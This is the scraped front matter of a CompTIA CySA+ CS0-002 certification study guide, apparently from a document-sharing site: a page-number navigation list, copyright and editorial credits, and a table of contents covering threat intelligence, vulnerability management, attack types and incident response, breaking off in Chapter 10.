Uploaded by ravichandragurung

dokumen.pub comptia-cybersecurity-analyst-cysa-cs0-002-cert-guide-2nd-edition-certification-guide-2nbsped-9780136747161

advertisement
Contents
1. Cover Page
2. About This eBook
3. Title Page
4. Copyright Page
5. Contents at a Glance
6. Table of Contents
7. About the Author
8. Dedication
9. Acknowledgments
10. About the Technical Reviewer
11. We Want to Hear from You!
12. Reader Services
13. Introduction
1. Goals and Methods
2. Who Should Read This Book?
3. Strategies for Exam Preparation
4. How the Book Is Organized
5. Book Features
6. What’s New?
7. The Companion Website for Online Content Review
8. How to Access the Pearson Test Prep Practice Test Software
9. Customizing Your Exams
14. Credits
15. Chapter 1 The Importance of Threat Data and Intelligence
1. “Do I Know This Already?” Quiz
2. Foundation Topics
3. Intelligence Sources
4. Indicator Management
5. Threat Classification
6. Threat Actors
7. Intelligence Cycle
8. Commodity Malware
9. Information Sharing and Analysis Communities
10. Exam Preparation Tasks
11. Review All Key Topics
12. Define Key Terms
13. Review Questions
16. Chapter 2 Utilizing Threat Intelligence to Support Organizational
Security
1. “Do I Know This Already?” Quiz
2. Foundation Topics
3. Attack Frameworks
4. Threat Research
5. Threat Modeling Methodologies
6. Threat Intelligence Sharing with Supported Functions
7. Exam Preparation Tasks
8. Review All Key Topics
9. Define Key Terms
10. Review Questions
17. Chapter 3 Vulnerability Management Activities
1. “Do I Know This Already?” Quiz
2. Foundation Topics
3. Vulnerability Identification
4. Validation
5. Remediation/Mitigation
6. Scanning Parameters and Criteria
7. Inhibitors to Remediation
8. Exam Preparation Tasks
9. Review All Key Topics
10. Define Key Terms
11. Review Questions
18. Chapter 4 Analyzing Assessment Output
1. “Do I Know This Already?” Quiz
2. Foundation Topics
3. Web Application Scanner
4. Infrastructure Vulnerability Scanner
5. Software Assessment Tools and Techniques
6. Enumeration
7. Wireless Assessment Tools
8. Cloud Infrastructure Assessment Tools
9. Exam Preparation Tasks
10. Review All Key Topics
11. Define Key Terms
12. Review Questions
19. Chapter 5 Threats and Vulnerabilities Associated with Specialized
Technology
1. “Do I Know This Already?” Quiz
2. Foundation Topics
3. Mobile
4. Internet of Things (IoT)
5. Embedded Systems
6. Real-Time Operating System (RTOS)
7. System-on-Chip (SoC)
8. Field Programmable Gate Array (FPGA)
9. Physical Access Control
10. Building Automation Systems
11. Vehicles and Drones
12. Workflow and Process Automation Systems
13. Incident Command System (ICS)
14. Supervisory Control and Data Acquisition (SCADA)
15. Exam Preparation Tasks
16. Review All Key Topics
17. Define Key Terms
18. Review Questions
20. Chapter 6 Threats and Vulnerabilities Associated with Operating in
the Cloud
1. “Do I Know This Already?” Quiz
2. Foundation Topics
3. Cloud Deployment Models
4. Cloud Service Models
5. Function as a Service (FaaS)/Serverless Architecture
6. Infrastructure as Code (IaC)
7. Insecure Application Programming Interface (API)
8. Improper Key Management
9. Unprotected Storage
10. Logging and Monitoring
11. Exam Preparation Tasks
12. Review All Key Topics
13. Define Key Terms
14. Review Questions
21. Chapter 7 Implementing Controls to Mitigate Attacks and Software
Vulnerabilities
1. “Do I Know This Already?” Quiz
2. Foundation Topics
3. Attack Types
4. Vulnerabilities
5. Exam Preparation Tasks
6. Review All Key Topics
7. Define Key Terms
8. Review Questions
22. Chapter 8 Security Solutions for Infrastructure Management
1. “Do I Know This Already?” Quiz
2. Foundation Topics
3. Cloud vs. On-premises
4. Asset Management
5. Segmentation
6. Network Architecture
7. Change Management
8. Virtualization
9. Containerization
10. Identity and Access Management
11. Cloud Access Security Broker (CASB)
12. Honeypot
13. Monitoring and Logging
14. Encryption
15. Certificate Management
16. Active Defense
17. Exam Preparation Tasks
18. Review All Key Topics
19. Define Key Terms
20. Review Questions
23. Chapter 9 Software Assurance Best Practices
1. “Do I Know This Already?” Quiz
2. Foundation Topics
3. Platforms
4. Software Development Life Cycle (SDLC) Integration
5. DevSecOps
6. Software Assessment Methods
7. Secure Coding Best Practices
8. Static Analysis Tools
9. Dynamic Analysis Tools
10. Formal Methods for Verification of Critical Software
11. Service-Oriented Architecture
12. Exam Preparation Tasks
13. Review All Key Topics
14. Define Key Terms
15. Review Questions
24. Chapter 10 Hardware Assurance Best Practices
1. “Do I Know This Already?” Quiz
2. Foundation Topics
3. Hardware Root of Trust
4. eFuse
5. Unified Extensible Firmware Interface (UEFI)
6. Trusted Foundry
7. Secure Processing
8. Anti-Tamper
9. Self-Encrypting Drives
10. Trusted Firmware Updates
11. Measured Boot and Attestation
12. Bus Encryption
13. Exam Preparation Tasks
14. Review All Key Topics
15. Define Key Terms
16. Review Questions
25. Chapter 11 Analyzing Data as Part of Security Monitoring Activities
1. “Do I Know This Already?” Quiz
2. Foundation Topics
3. Heuristics
4. Trend Analysis
5. Endpoint
6. Network
7. Log Review
8. Impact Analysis
9. Security Information and Event Management (SIEM) Review
10. Query Writing
11. E-mail Analysis
12. Exam Preparation Tasks
13. Review All Key Topics
14. Define Key Terms
15. Review Questions
26. Chapter 12 Implementing Configuration Changes to Existing Controls
to Improve Security
1. “Do I Know This Already?” Quiz
2. Foundation Topics
3. Permissions
4. Whitelisting and Blacklisting
5. Firewall
6. Intrusion Prevention System (IPS) Rules
7. Data Loss Prevention (DLP)
8. Endpoint Detection and Response (EDR)
9. Network Access Control (NAC)
10. Sinkholing
11. Malware Signatures
12. Sandboxing
13. Port Security
14. Exam Preparation Tasks
15. Review All Key Topics
16. Define Key Terms
17. Review Questions
27. Chapter 13 The Importance of Proactive Threat Hunting
1. “Do I Know This Already?” Quiz
2. Foundation Topics
3. Establishing a Hypothesis
4. Profiling Threat Actors and Activities
5. Threat Hunting Tactics
6. Reducing the Attack Surface Area
7. Bundling Critical Assets
8. Attack Vectors
9. Integrated Intelligence
10. Improving Detection Capabilities
11. Exam Preparation Tasks
12. Review All Key Topics
13. Define Key Terms
14. Review Questions
28. Chapter 14 Automation Concepts and Technologies
1. “Do I Know This Already?” Quiz
2. Foundation Topics
3. Workflow Orchestration
4. Scripting
5. Application Programming Interface (API) Integration
6. Automated Malware Signature Creation
7. Data Enrichment
8. Threat Feed Combination
9. Machine Learning
10. Use of Automation Protocols and Standards
11. Continuous Integration
12. Continuous Deployment/Delivery
13. Exam Preparation Tasks
14. Review All Key Topics
15. Define Key Terms
16. Review Questions
29. Chapter 15 The Incident Response Process
1. “Do I Know This Already?” Quiz
2. Foundation Topics
3. Communication Plan
4. Response Coordination with Relevant Entities
5. Factors Contributing to Data Criticality
6. Exam Preparation Tasks
7. Review All Key Topics
8. Define Key Terms
9. Review Questions
30. Chapter 16 Applying the Appropriate Incident Response Procedure
1. “Do I Know This Already?” Quiz
2. Foundation Topics
3. Preparation
4. Detection and Analysis
5. Containment
6. Eradication and Recovery
7. Post-Incident Activities
8. Exam Preparation Tasks
9. Review All Key Topics
10. Define Key Terms
11. Review Questions
31. Chapter 17 Analyzing Potential Indicators of Compromise
1. “Do I Know This Already?” Quiz
2. Foundation Topics
3. Network-Related Indicators of Compromise
4. Host-Related Indicators of Compromise
5. Application-Related Indicators of Compromise
6. Exam Preparation Tasks
7. Review All Key Topics
8. Define Key Terms
9. Review Questions
32. Chapter 18 Utilizing Basic Digital Forensics Techniques
1. “Do I Know This Already?” Quiz
2. Foundation Topics
3. Network
4. Endpoint
5. Mobile
6. Cloud
7. Virtualization
8. Legal Hold
9. Procedures
10. Hashing
11. Carving
12. Data Acquisition
13. Exam Preparation Tasks
14. Review All Key Topics
15. Define Key Terms
16. Review Questions
33. Chapter 19 The Importance of Data Privacy and Protection
1. “Do I Know This Already?” Quiz
2. Foundation Topics
3. Privacy vs. Security
4. Non-technical Controls
5. Technical Controls
6. Exam Preparation Tasks
7. Review All Key Topics
8. Define Key Terms
9. Review Questions
34. Chapter 20 Applying Security Concepts in Support of Organizational
Risk Mitigation
1. “Do I Know This Already?” Quiz
2. Foundation Topics
3. Business Impact Analysis
4. Risk Identification Process
5. Risk Calculation
6. Communication of Risk Factors
7. Risk Prioritization
8. Systems Assessment
9. Documented Compensating Controls
10. Training and Exercises
11. Supply Chain Assessment
12. Exam Preparation Tasks
13. Review All Key Topics
14. Define Key Terms
15. Review Questions
35. Chapter 21 The Importance of Frameworks, Policies, Procedures, and
Controls
1. “Do I Know This Already?” Quiz
2. Foundation Topics
3. Frameworks
4. Policies and Procedures
5. Category
6. Control Type
7. Audits and Assessments
8. Exam Preparation Tasks
9. Review All Key Topics
10. Define Key Terms
11. Review Questions
36. Chapter 22 Final Preparation
1. Exam Information
2. Getting Ready
3. Tools for Final Preparation
4. Suggested Plan for Final Review/Study
5. Summary
37. Appendix A Answers to the “Do I Know This Already?” Quizzes and
Review Questions
38. Appendix B CompTIA Cybersecurity Analyst (CySA+) CS0-002 Cert
Guide Exam Updates
1. Always Get the Latest at the Book’s Product Page
2. Technical Content
39. Glossary of Key Terms
40. Index
41. Appendix C Memory Tables
42. Appendix D Memory Tables Answer Key
43. Appendix E Study Planner
44. Where are the companion content files? - Register
45. Inside Front Cover
46. Inside Back Cover
47. Code Snippets
1. i
2. ii
3. iii
4. iv
5. v
6. vi
7. vii
8. viii
9. ix
10. x
11. xi
12. xii
13. xiii
14. xiv
15. xv
16. xvi
17. xvii
18. xviii
19. xix
20. xx
21. xxi
22. xxii
23. xxiii
24. xxiv
25. xxv
26. xxvi
27. xxvii
28. xxviii
29. xxix
30. xxx
31. xxxi
32. xxxii
33. xxxiii
34. xxxiv
35. xxxv
36. xxxvi
37. xxxvii
38. xxxviii
39. xxxix
40. xl
41. xli
42. xlii
43. xliii
44. xliv
45. xlv
46. 2
47. 3
48. 4
49. 5
50. 6
51. 7
52. 8
53. 9
54. 10
55. 11
56. 12
57. 13
58. 14
59. 15
60. 16
61. 17
62. 18
63. 19
64. 20
65. 21
66. 22
67. 23
68. 24
69. 25
70. 26
71. 27
72. 28
73. 29
74. 30
75. 31
76. 32
77. 33
78. 34
79. 35
80. 36
81. 37
82. 38
83. 39
84. 40
85. 41
86. 42
87. 43
88. 44
89. 45
90. 46
91. 47
92. 48
93. 49
94. 50
95. 51
96. 52
97. 53
98. 54
99. 55
100. 56
101. 57
102. 58
103. 59
104. 60
105. 61
106. 62
107. 63
108. 64
109. 65
110. 66
111. 67
112. 68
113. 69
114. 70
115. 71
116. 72
117. 73
118. 74
119. 75
120. 76
121. 77
122. 78
123. 79
124. 80
125. 81
126. 82
127. 83
128. 84
129. 85
130. 86
131. 87
132. 88
133. 89
134. 90
135. 91
136. 92
137. 93
138. 94
139. 95
140. 96
141. 97
142. 98
143. 99
144. 100
145. 101
146. 102
147. 103
148. 104
149. 105
150. 106
151. 107
152. 108
153. 109
154. 110
155. 111
156. 112
157. 113
158. 114
159. 115
160. 116
161. 117
162. 118
163. 119
164. 120
165. 121
166. 122
167. 123
168. 124
169. 125
170. 126
171. 127
172. 128
173. 129
174. 130
175. 131
176. 132
177. 133
178. 134
179. 135
180. 136
181. 137
182. 138
183. 139
184. 140
185. 141
186. 142
187. 143
188. 144
189. 145
190. 146
191. 147
192. 148
193. 149
194. 150
195. 151
196. 152
197. 153
198. 154
199. 155
200. 156
201. 157
202. 158
203. 159
204. 160
205. 161
206. 162
207. 163
208. 164
209. 165
210. 166
211. 167
212. 168
213. 169
214. 170
215. 171
216. 172
217. 173
218. 174
219. 175
220. 176
221. 177
222. 178
223. 179
224. 180
225. 181
226. 182
227. 183
228. 184
229. 185
230. 186
231. 187
232. 188
233. 189
234. 190
235. 191
236. 192
237. 193
238. 194
239. 195
240. 196
241. 197
242. 198
243. 199
244. 200
245. 201
246. 202
247. 203
248. 204
249. 205
250. 206
251. 207
252. 208
253. 209
254. 210
255. 211
256. 212
257. 213
258. 214
259. 215
260. 216
261. 217
262. 218
263. 219
264. 220
265. 221
266. 222
267. 223
268. 224
269. 225
270. 226
271. 227
272. 228
273. 229
274. 230
275. 231
276. 232
277. 233
278. 234
279. 235
280. 236
281. 237
282. 238
283. 239
284. 240
285. 241
286. 242
287. 243
288. 244
289. 245
290. 246
291. 247
292. 248
293. 249
294. 250
295. 251
296. 252
297. 253
298. 254
299. 255
300. 256
301. 257
302. 258
303. 259
304. 260
305. 261
306. 262
307. 263
308. 264
309. 265
310. 266
311. 267
312. 268
313. 269
314. 270
315. 271
316. 272
317. 273
318. 274
319. 275
320. 276
321. 277
322. 278
323. 279
324. 280
325. 281
326. 282
327. 283
328. 284
329. 285
330. 286
331. 287
332. 288
333. 289
334. 290
335. 291
336. 292
337. 293
338. 294
339. 295
340. 296
341. 297
342. 298
343. 299
344. 300
345. 301
346. 302
347. 303
348. 304
349. 305
350. 306
351. 307
352. 308
353. 309
354. 310
355. 311
356. 312
357. 313
358. 314
359. 315
360. 316
361. 317
362. 318
363. 319
364. 320
365. 321
366. 322
367. 323
368. 324
369. 325
370. 326
371. 327
372. 328
373. 329
374. 330
375. 331
376. 332
377. 333
378. 334
379. 335
380. 336
381. 337
382. 338
383. 339
384. 340
385. 341
386. 342
387. 343
388. 344
389. 345
390. 346
391. 347
392. 348
393. 349
394. 350
395. 351
396. 352
397. 353
398. 354
399. 355
400. 356
401. 357
402. 358
403. 359
404. 360
405. 361
406. 362
407. 363
408. 364
409. 365
410. 366
411. 367
412. 368
413. 369
414. 370
415. 371
416. 372
417. 373
418. 374
419. 375
420. 376
421. 377
422. 378
423. 379
424. 380
425. 381
426. 382
427. 383
428. 384
429. 385
430. 386
431. 387
432. 388
433. 389
434. 390
435. 391
436. 392
437. 393
438. 394
439. 395
440. 396
441. 397
442. 398
443. 399
444. 400
445. 401
446. 402
447. 403
448. 404
449. 405
450. 406
451. 407
452. 408
453. 409
454. 410
455. 411
456. 412
457. 413
458. 414
459. 415
460. 416
461. 417
462. 418
463. 419
464. 420
465. 421
466. 422
467. 423
468. 424
469. 425
470. 426
471. 427
472. 428
473. 429
474. 430
475. 431
476. 432
477. 433
478. 434
479. 435
480. 436
481. 437
482. 438
483. 439
484. 440
485. 441
486. 442
487. 443
488. 444
489. 445
490. 446
491. 447
492. 448
493. 449
494. 450
495. 451
496. 452
497. 453
498. 454
499. 455
500. 456
501. 457
502. 458
503. 459
504. 460
505. 461
506. 462
507. 463
508. 464
509. 465
510. 466
511. 467
512. 468
513. 469
514. 470
515. 471
516. 472
517. 473
518. 474
519. 475
520. 476
521. 477
522. 478
523. 479
524. 480
525. 481
526. 482
527. 483
528. 484
529. 485
530. 486
531. 487
532. 488
533. 489
534. 490
535. 491
536. 492
537. 493
538. 494
539. 495
540. 496
541. 497
542. 498
543. 499
544. 500
545. 501
546. 502
547. 503
548. 504
549. 505
550. 506
551. 507
552. 508
553. 509
554. 510
555. 511
556. 512
557. 513
558. 514
559. 515
560. 516
561. 517
562. 518
563. 519
564. 520
565. 521
566. 522
567. 523
568. 524
569. 525
570. 526
571. 527
572. 528
573. 529
574. 530
575. 531
576. 532
577. 533
578. 534
579. 535
580. 536
581. 537
582. 538
583. 539
584. 540
585. 541
586. 542
587. 543
588. 544
589. 545
590. 546
591. 547
592. 548
593. 549
594. 550
595. 551
596. 552
597. 553
598. 554
599. 555
600. 556
601. 557
602. 558
603. 559
604. 560
605. 561
606. 562
607. 563
608. 564
609. 565
610. 566
611. 567
612. 568
613. 569
614. 570
615. 571
616. 572
617. 573
618. 574
619. 575
620. 576
621. 577
622. 578
623. 579
624. 580
625. 581
626. 582
627. 583
628. 584
629. 585
630. 586
631. 587
632. 588
633. 589
634. 590
635. 591
636. 592
637. 593
638. 594
639. 595
640. 596
641. 597
642. 598
643. 599
644. 600
645. 601
646. 602
647. 603
648. 604
649. 605
650. 606
651. 607
652. 608
653. 609
654. 610
655. 611
656. 612
657. 613
658. 614
659. 615
660. 616
661. 617
662. 618
663. 619
664. 620
665. 621
666. 622
667. 623
668. 624
669. 625
670. 626
671. 627
672. 628
673. 629
674. 630
675. 631
676. 632
677. 633
678. 634
679. 635
680. 636
681. 637
682. 638
683. 639
684. 640
685. 641
686. 642
687. 643
688. 644
689. 645
690. 646
691. 647
692. 648
693. 649
694. 651
695. 652
696. 653
697. 654
698. 655
699. 656
700. 657
701. 658
702. 659
703. 660
704. 661
705. 662
706. 663
707. 664
708. 665
709. 666
710. 667
711. 668
712. 669
713. 670
714. 671
715. 672
716. 673
717. 674
718. 675
719. 676
720. 677
721. 678
722. 679
723. 680
724. 681
725. 682
726. 683
727. 684
728. 685
729. 686
730. 687
731. 688
732. 689
733. 690
734. 691
735. 692
736. 693
737. 694
738. 695
739. 696
740. 697
741. 698
742. 699
743. 700
744. 701
745. 702
746. 703
747. 704
748. 705
749. 706
750. 707
751. 708
752. 709
753. 710
754. 711
755. 712
756. 713
757. 714
758. 715
759. 716
760. 717
761. 718
762. 719
763. 720
764. 721
765. 722
766. 723
767. 724
768. 725
769. 726
770. 727
771. 728
772. 729
773. 730
774. 731
775. 732
776. 733
777. 734
778. 735
779. 736
780. 737
781. 738
782. 739
783. 740
784. C-1
785. C-2
786. C-3
787. C-4
788. C-5
789. C-6
790. C-7
791. C-8
792. C-9
793. C-10
794. D-1
795. D-2
796. D-3
797. D-4
798. D-5
799. D-6
800. D-7
801. D-8
802. D-9
803. D-10
804. E-1
About This eBook
ePUB is an open, industry-standard format for eBooks.
However, support of ePUB and its many features varies across
reading devices and applications. Use your device or app
settings to customize the presentation to your liking. Settings
that you can customize often include font, font size, single or
double column, landscape or portrait mode, and figures that
you can click or tap to enlarge. For additional information about
the settings and features on your reading device or app, visit the
device manufacturer’s Web site.
Many titles include programming code or configuration
examples. To optimize the presentation of these elements, view
the eBook in single-column, landscape mode and adjust the font
size to the smallest setting. In addition to presenting code and
configurations in the reflowable text format, we have included
images of the code that mimic the presentation found in the
print book; therefore, where the reflowable format may
compromise the presentation of the code listing, you will see a
“Click here to view code image” link. Click the link to view the
print-fidelity code image. To return to the previous page viewed,
click the Back button on your device or app.
CompTIA Cybersecurity
Analyst (CySA+) CS0-002
Cert Guide
Troy McMillan
CompTIA Cybersecurity Analyst (CySA+) CS0-002 Cert
Guide
Copyright © 2021 by Pearson Education, Inc.
Hoboken, New Jersey
All rights reserved. No part of this book shall be reproduced,
stored in a retrieval system, or transmitted by any means,
electronic, mechanical, photocopying, recording, or otherwise,
without written permission from the publisher. No patent
liability is assumed with respect to the use of the information
contained herein. Although every precaution has been taken in
the preparation of this book, the publisher and author assume
no responsibility for errors or omissions. Nor is any liability
assumed for damages resulting from the use of the information
contained herein.
ISBN-13: 978-0-13-674716-1
ISBN-10: 0-13-674716-7
Library of Congress Control Number: 2020941742
ScoutAutomatedPrintCode
Trademarks
All terms mentioned in this book that are known to be
trademarks or service marks have been appropriately
capitalized. Pearson IT Certification cannot attest to the
accuracy of this information. Use of a term in this book should
not be regarded as affecting the validity of any trademark or
service mark.
Warning and Disclaimer
Every effort has been made to make this book as complete and
as accurate as possible, but no warranty or fitness is implied.
The information provided is on an “as is” basis. The author and
the publisher shall have neither liability nor responsibility to
any person or entity with respect to any loss or damages arising
from the information contained in this book.
Special Sales
For information about buying this title in bulk quantities, or for
special sales opportunities (which may include electronic
versions; custom cover designs; and content particular to your
business, training goals, marketing focus, or branding
interests), please contact our corporate sales department at
corpsales@pearsoned.com or (800) 382-3419.
For government sales inquiries, please contact
governmentsales@pearsoned.com.
For questions about sales outside the U.S., please contact
intlcs@pearson.com.
Editor-in-Chief
Mark Taub
Product Line Manager
Brett Bartow
Executive Editor
Nancy Davis
Development Editor
Christopher Cleveland
Managing Editor
Sandra Schroeder
Senior Project Editor
Tonya Simpson
Copy Editor
Bill McManus
Indexer
Erika Millen
Proofreader
Abigail Manheim
Technical Editor
Chris Crayton
Editorial Assistant
Cindy Teeters
Cover Designer
Chuti Prasertsith
Compositor
codeMantra
Contents at a Glance
Introduction
CHAPTER 1 The Importance of Threat Data and Intelligence
CHAPTER 2 Utilizing Threat Intelligence to Support
Organizational Security
CHAPTER 3 Vulnerability Management Activities
CHAPTER 4 Analyzing Assessment Output
CHAPTER 5 Threats and Vulnerabilities Associated with
Specialized Technology
CHAPTER 6 Threats and Vulnerabilities Associated with
Operating in the Cloud
CHAPTER 7 Implementing Controls to Mitigate Attacks and
Software Vulnerabilities
CHAPTER 8 Security Solutions for Infrastructure
Management
CHAPTER 9 Software Assurance Best Practices
CHAPTER 10 Hardware Assurance Best Practices
CHAPTER 11 Analyzing Data as Part of Security Monitoring
Activities
CHAPTER 12 Implementing Configuration Changes to
Existing Controls to Improve Security
CHAPTER 13 The Importance of Proactive Threat Hunting
CHAPTER 14 Automation Concepts and Technologies
CHAPTER 15 The Incident Response Process
CHAPTER 16 Applying the Appropriate Incident Response
Procedure
CHAPTER 17 Analyzing Potential Indicators of Compromise
CHAPTER 18 Utilizing Basic Digital Forensics Techniques
CHAPTER 19 The Importance of Data Privacy and Protection
CHAPTER 20 Applying Security Concepts in Support of
Organizational Risk Mitigation
CHAPTER 21 The Importance of Frameworks, Policies,
Procedures, and Controls
CHAPTER 22 Final Preparation
APPENDIX A Answers to the “Do I Know This Already?”
Quizzes and Review Questions
APPENDIX B CompTIA Cybersecurity Analyst (CySA+) CS0002 Cert Guide Exam Updates
Glossary of Key Terms
Index
Online Elements:
APPENDIX C Memory Tables
APPENDIX D Memory Tables Answer Key
APPENDIX E Study Planner
Glossary of Key Terms
Table of Contents
Introduction
Chapter 1 The Importance of Threat Data and
Intelligence
“Do I Know This Already?” Quiz
Foundation Topics
Intelligence Sources
Open-Source Intelligence
Proprietary/Closed-Source Intelligence
Timeliness
Relevancy
Confidence Levels
Accuracy
Indicator Management
Structured Threat Information eXpression
(STIX)
Trusted Automated eXchange of Indicator
Information (TAXII)
OpenIOC
Threat Classification
Known Threat vs. Unknown Threat
Zero-day
Advanced Persistent Threat
Threat Actors
Nation-state
Organized Crime
Terrorist Groups
Hacktivist
Insider Threat
Intentional
Unintentional
Intelligence Cycle
Commodity Malware
Information Sharing and Analysis Communities
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 2 Utilizing Threat Intelligence to Support
Organizational Security
“Do I Know This Already?” Quiz
Foundation Topics
Attack Frameworks
MITRE ATT&CK
The Diamond Model of Intrusion Analysis
Kill Chain
Threat Research
Reputational
Behavioral
Indicator of Compromise (IoC)
Common Vulnerability Scoring System (CVSS)
Threat Modeling Methodologies
Adversary Capability
Total Attack Surface
Attack Vector
Impact
Probability
Threat Intelligence Sharing with Supported
Functions
Incident Response
Vulnerability Management
Risk Management
Security Engineering
Detection and Monitoring
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 3 Vulnerability Management Activities
“Do I Know This Already?” Quiz
Foundation Topics
Vulnerability Identification
Asset Criticality
Active vs. Passive Scanning
Mapping/Enumeration
Validation
Remediation/Mitigation
Configuration Baseline
Patching
Hardening
Compensating Controls
Risk Acceptance
Verification of Mitigation
Scanning Parameters and Criteria
Risks Associated with Scanning Activities
Vulnerability Feed
Scope
Credentialed vs. Non-credentialed
Server-based vs. Agent-based
Internal vs. External
Special Considerations
Types of Data
Technical Constraints
Workflow
Sensitivity Levels
Regulatory Requirements
Segmentation
Intrusion Prevention System (IPS), Intrusion
Detection System (IDS), and Firewall Settings
Firewall
Inhibitors to Remediation
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 4 Analyzing Assessment Output
“Do I Know This Already?” Quiz
Foundation Topics
Web Application Scanner
Burp Suite
OWASP Zed Attack Proxy (ZAP)
Nikto
Arachni
Infrastructure Vulnerability Scanner
Nessus
OpenVAS
Software Assessment Tools and Techniques
Static Analysis
Dynamic Analysis
Reverse Engineering
Fuzzing
Enumeration
Nmap
Host Scanning
hping
Active vs. Passive
Responder
Wireless Assessment Tools
Aircrack-ng
Reaver
oclHashcat
Cloud Infrastructure Assessment Tools
ScoutSuite
Prowler
Pacu
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 5 Threats and Vulnerabilities Associated with
Specialized Technology
“Do I Know This Already?” Quiz
Foundation Topics
Mobile
Unsigned Apps/System Apps
Security Implications/Privacy Concerns
Data Storage
Nonremovable Storage
Removable Storage
Transfer/Back Up Data to Uncontrolled Storage
USB OTG
Device Loss/Theft
Rooting/Jailbreaking
Push Notification Services
Geotagging
OEM/Carrier Android Fragmentation
Mobile Payment
NFC Enabled
Inductance Enabled
Mobile Wallet
Peripheral-Enabled Payments (Credit Card
Reader)
USB
Malware
Unauthorized Domain Bridging
SMS/MMS/Messaging
Internet of Things (IoT)
IoT Examples
Methods of Securing IoT Devices
Embedded Systems
Real-Time Operating System (RTOS)
System-on-Chip (SoC)
Field Programmable Gate Array (FPGA)
Physical Access Control
Systems
Devices
Facilities
Building Automation Systems
IP Video
HVAC Controllers
Sensors
Vehicles and Drones
CAN Bus
Drones
Workflow and Process Automation Systems
Incident Command System (ICS)
Supervisory Control and Data Acquisition (SCADA)
Modbus
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 6 Threats and Vulnerabilities Associated with
Operating in the Cloud
“Do I Know This Already?” Quiz
Foundation Topics
Cloud Deployment Models
Cloud Service Models
Function as a Service (FaaS)/Serverless Architecture
Infrastructure as Code (IaC)
Insecure Application Programming Interface (API)
Improper Key Management
Key Escrow
Key Stretching
Unprotected Storage
Transfer/Back Up Data to Uncontrolled Storage
Big Data
Logging and Monitoring
Insufficient Logging and Monitoring
Inability to Access
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 7 Implementing Controls to Mitigate Attacks
and Software Vulnerabilities
“Do I Know This Already?” Quiz
Foundation Topics
Attack Types
Extensible Markup Language (XML) Attack
Structured Query Language (SQL) Injection
Overflow Attacks
Buffer
Integer Overflow
Heap
Remote Code Execution
Directory Traversal
Privilege Escalation
Password Spraying
Credential Stuffing
Impersonation
Man-in-the-Middle Attack
VLAN-based Attacks
Session Hijacking
Rootkit
Cross-Site Scripting
Reflected
Persistent
Document Object Model (DOM)
Vulnerabilities
Improper Error Handling
Dereferencing
Insecure Object Reference
Race Condition
Broken Authentication
Sensitive Data Exposure
Insecure Components
Code Reuse
Insufficient Logging and Monitoring
Weak or Default Configurations
Use of Insecure Functions
strcpy
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 8 Security Solutions for Infrastructure
Management
“Do I Know This Already?” Quiz
Foundation Topics
Cloud vs. On-premises
Cloud Mitigations
Asset Management
Asset Tagging
Device-Tracking Technologies
Geolocation/GPS Location
Object-Tracking and Object-Containment
Technologies
Geotagging/Geofencing
RFID
Segmentation
Physical
LAN
Intranet
Extranet
DMZ
Virtual
Jumpbox
System Isolation
Air Gap
Network Architecture
Physical
Firewall Architecture
Software-Defined Networking
Virtual SAN
Virtual Private Cloud (VPC)
Virtual Private Network (VPN)
IPsec
SSL/TLS
Serverless
Change Management
Virtualization
Security Advantages and Disadvantages of
Virtualization
Type 1 vs. Type 2 Hypervisors
Virtualization Attacks and Vulnerabilities
Virtual Networks
Management Interface
Vulnerabilities Associated with a Single Physical
Server Hosting Multiple Companies’ Virtual
Machines
Vulnerabilities Associated with a Single Platform
Hosting Multiple Companies’ Virtual Machines
Virtual Desktop Infrastructure (VDI)
Terminal Services/Application Delivery Services
Containerization
Identity and Access Management
Identify Resources
Identify Users
Identify Relationships Between Resources and
Users
Privilege Management
Multifactor Authentication (MFA)
Authentication
Authentication Factors
Knowledge Factors
Ownership Factors
Characteristic Factors
Single Sign-On (SSO)
Kerberos
Active Directory
SESAME
Federation
XACML
SPML
SAML
OpenID
Shibboleth
Role-Based Access Control
Attribute-Based Access Control
Mandatory Access Control
Manual Review
Cloud Access Security Broker (CASB)
Honeypot
Monitoring and Logging
Log Management
Audit Reduction Tools
NIST SP 800-137
Encryption
Cryptographic Types
Symmetric Algorithms
Asymmetric Algorithms
Hybrid Encryption
Hashing Functions
One-way Hash
Message Digest Algorithm
Secure Hash Algorithm
Transport Encryption
SSL/TLS
HTTP/HTTPS/SHTTP
SSH
IPsec
Certificate Management
Certificate Authority and Registration Authority
Certificates
Certificate Revocation List
OCSP
PKI Steps
Cross-Certification
Digital Signatures
Active Defense
Hunt Teaming
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 9 Software Assurance Best Practices
“Do I Know This Already?” Quiz
Foundation Topics
Platforms
Mobile
Containerization
Configuration Profiles and Payloads
Personally Owned, Corporate Enabled
Corporate-Owned, Personally Enabled
Application Wrapping
Application, Content, and Data Management
Remote Wiping
SCEP
NIST SP 800-163 Rev 1
Web Application
Maintenance Hooks
Time-of-Check/Time-of-Use Attacks
Cross-Site Request Forgery (CSRF)
Click-Jacking
Client/Server
Embedded
Hardware/Embedded Device Analysis
System-on-Chip (SoC)
Secure Booting
Central Security Breach Response
Firmware
Software Development Life Cycle (SDLC) Integration
Step 1: Plan/Initiate Project
Step 2: Gather Requirements
Step 3: Design
Step 4: Develop
Step 5: Test/Validate
Step 6: Release/Maintain
Step 7: Certify/Accredit
Step 8: Change Management and Configuration
Management/Replacement
DevSecOps
DevOps
Software Assessment Methods
User Acceptance Testing
Stress Test Application
Security Regression Testing
Code Review
Security Testing
Code Review Process
Secure Coding Best Practices
Input Validation
Output Encoding
Session Management
Authentication
Context-based Authentication
Network Authentication Methods
IEEE 802.1X
Biometric Considerations
Certificate-Based Authentication
Data Protection
Parameterized Queries
Static Analysis Tools
Dynamic Analysis Tools
Formal Methods for Verification of Critical Software
Service-Oriented Architecture
Security Assertions Markup Language (SAML)
Simple Object Access Protocol (SOAP)
Representational State Transfer (REST)
Microservices
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 10 Hardware Assurance Best Practices
“Do I Know This Already?” Quiz
Foundation Topics
Hardware Root of Trust
Trusted Platform Module (TPM)
Virtual TPM
Hardware Security Module (HSM)
MicroSD HSM
eFuse
